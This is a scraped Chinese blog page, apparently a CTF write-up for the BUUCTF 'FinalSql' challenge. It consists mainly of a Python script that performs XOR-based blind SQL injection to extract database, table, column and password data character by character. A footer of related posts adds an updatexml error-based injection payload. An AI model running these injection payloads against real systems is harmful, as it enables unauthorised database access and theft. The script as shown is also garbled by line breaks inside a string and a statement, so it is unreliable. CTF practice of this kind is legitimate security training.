2. 程式人生 > 實用技巧 >2019極客大挑戰EasySql、LoveSql、BabySql、HardSql、FinalSql

2019極客大挑戰EasySql、LoveSql、BabySql、HardSql、FinalSql

阿新 發佈:2020-10-21 

#這裡提一下,由於伺服器可能會出現429太多請求的錯誤,會導致指令碼測試某些欄位匹配不到。建議多跑幾次flag。
#這題目裡password欄位太長了,建議直接從170位到220位測試(小心別踩坑,因為429錯誤)。
import requests

url = 'http://c3d4ded5-63fb-4d51-b784-e73ad570a432.node3.buuoj.cn/search.php?id=1'
#資料庫、表名、欄位查詢語句
database = 'select(database())'

table = 'select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()
 
'

column = "select(group_concat(column_name))from(information_schema.columns)where(table_name)=('F1naI1y')"

key = 'select(group_concat(password))from(F1naI1y)'

result = ''

for i in range(170,220):
    for j in range(32,126):
        payload = '^(ascii(substr(({}),{},1))={})'.format(key,i,j)
        res 
 
= requests.get(url+payload)
        print(chr(j))
        #如果頁面內容中出現ERROR猜測正確
        if 'ERROR' in res.text:
            result += chr(j)
            print(res.url)
            print(i)
            print(result)
            break

相關推薦

2019挑戰EasySqlLoveSqlBabySqlHardSqlFinalSql

#這裡提一下,由於伺服器可能會出現429太多請求的錯誤,會導致指令碼測試某些欄位匹配不到。建議多跑幾次flag。#這題目裡password欄位太長了,建議直接從170位到220位測試(小心別踩坑,因為429錯誤)。import req

2019挑戰PHP反序列化

1. 進入題目看到一隻貓和提示備份的習慣。猜測可能有原始碼洩露,通過目錄掃描工具可以獲取到備份檔案:www.zip包含其原始碼。 2. 對其原始碼進行審計  a. index.php 包含檔案index.php;通過get方式獲取一個引數

[挑戰 2019]LoveSQL

0x00 開啟網頁 首先試試萬能密碼 賬戶:隨意 密碼:1\' or 1=1# 得到一段加密的密文,應該是MD5,結果找了很多網站也沒能解開

[挑戰 2019]EasySQL

[挑戰 2019]EasySQL 嘗試使用萬能密碼登入:admin’or 1=1 – ss 成功。

[BUUCTF][Web][挑戰 2019]LoveSQL 1

開啟靶機url,頁面顯示有兩個輸入框,框中輸入123\',發現兩個框都有sql注入問題

[挑戰 2019]PHP

題目上說有備份的好習慣,掃描目錄得到www.zip 幾個重要php檔案內容: index.php 1 <?php

[挑戰 2019]BuyFlag

0x01 進入頁面如下 結合題目buyflag的提示,我們點選payflag看看 檢視一下原始碼 發現端倪

[挑戰 2019]BabySQL

解題思路 打開發現是登陸框,先嚐試下二次注入 admin\'# 123456 ,登陸成功,獲取密碼,但是不知道下一步如何利用。

[挑戰 2019]Secret File 思路

絕密檔案,開啟首頁是這個 之後我們開啟原始碼發現了一個頁面,我們跟進去

[挑戰 2019]HardSQL updatexml

報錯注入連結: https://www.cnblogs.com/richardlee97/p/10617115.html報錯原因: 其原因主要是因為虛擬表的主鍵重複。按照MySQL的官方說法,group by要進行兩次運算,第一次是拿group by後面的欄位值到虛擬表中去對

BUUCTF-[挑戰 2019]PHP 1

開啟題目,我們就看到這個貓,先是用滑鼠晃了晃,還跟著我的游標搖腦袋。我是來做題的。前端工程師肯定也對這個下功夫了。

BUUCTF-[挑戰 2019]HardSQL 1詳解

來到sql注入騷姿勢,我們一點一點開始學 我們來到這道題,然後嘗試注入,結果發現

[挑戰 2019]PHP 1

進入頁面,檢查原始碼之類的都沒資訊,提到了備份,用御劍掃描出www.zip,直接加在url後

BUUCTF-[挑戰 2019]HardSQL 1

使用updatexml報錯法注入 http://1bfb9fee-1fce-4f07-81b1-c8048e473a66.node3.buuoj.cn/check.php?username=admin\'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21

[挑戰 2019]HardSQL

技術標籤:web 嘗試了一下發現空格在內的好多東西都被過濾掉了學到了報錯注入(空格用括號代替)

Buuctf-web-[挑戰 2019]HardSQL

被堵 異或運算子為^ 或者 xor兩個同為真的條件做異或,結果為假,兩個同為假的條件做異或,結果為假,一個條件為真,一個條件為假,結果為真,null與任何條件(真null)做異或,結果都為null

buu-[挑戰 2019]PHP

開啟題目 根據提示 用備份檔案的字典來爆破 得知備份檔案為www.zip 將備份檔案下載下來

[挑戰 2019]BuyFlag 1

本篇文章通過CTF試題-主要內容就是php-strcmp函式繞過,php弱型別比較 [挑戰 2019]BuyFlag 1

[挑戰 2019]HardSQL 1-SQL報錯注入

SQL注入-報錯注入 [挑戰 2019]HardSQL 試題地址:http://94d112f4-9aed-4f3e-b2ff-0c98f30a81b9.node4.buuoj.cn/

[挑戰 2019]FinalSQL

貼個盲註腳本 仔細檢視它的提示,試一試盲注 import requests import time url = \'http://994f19ff-38c7-446e-b200-01d5ce55d8bc.node3.buuoj.cn/search.php\'